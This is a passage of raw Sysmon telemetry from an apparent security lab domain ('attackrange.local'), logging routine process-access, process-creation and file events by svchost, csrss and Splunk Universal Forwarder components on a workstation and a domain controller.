cb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246218Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.832{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246217Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.832{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246216Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.832{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246215Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.832{CB4067E1-304A-6062-0500-00000000AF01}392936C:\Windows\system32\csrss.exe{CB4067E1-525A-6063-C222-00000000AF01}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000246214Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.832{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-525A-6063-C222-00000000AF01}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000246213Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.832{CB4067E1-525A-6063-C222-00000000AF01}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246212Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.519{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8C61D57FD80378629243D10975CF8A4,SHA256=A5BD1638D08F50A1B4F0EEC2A9F44967FC4304807AE152F363301E388F454C0E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000246211Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.269{CB4067E1-525A-6063-C122-00000000AF01}27601580C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246210Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.160{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-525A-6063-C122-00000000AF01}2760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246209Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.160{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246208Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.160{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246207Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.160{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246206Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.160{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246205Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.160{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246204Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.160{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246203Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.160{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246202Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.160{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246201Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.160{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246200Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.160{CB4067E1-304A-6062-0500-00000000AF01}392508C:\Windows\system32\csrss.exe{CB4067E1-525A-6063-C122-00000000AF01}2760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000246199Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.160{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-525A-6063-C122-00000000AF01}2760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000246198Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.161{CB4067E1-525A-6063-C122-00000000AF01}2760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246197Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:22.004{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2DAACB30B50E1C6641DB8F5488F64348,SHA256=66C93805F95D833A267F7ACD6DA049CDAC66B73F8DDA2BF5EA9EF370DAFE116D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061457Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:23.905{7F8C56E7-525B-6063-3101-00000000AF01}58804364C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061456Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:23.780{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-525B-6063-3101-00000000AF01}5880C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061455Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:23.780{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061454Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:23.780{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061453Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:23.780{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061452Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:23.780{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061451Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 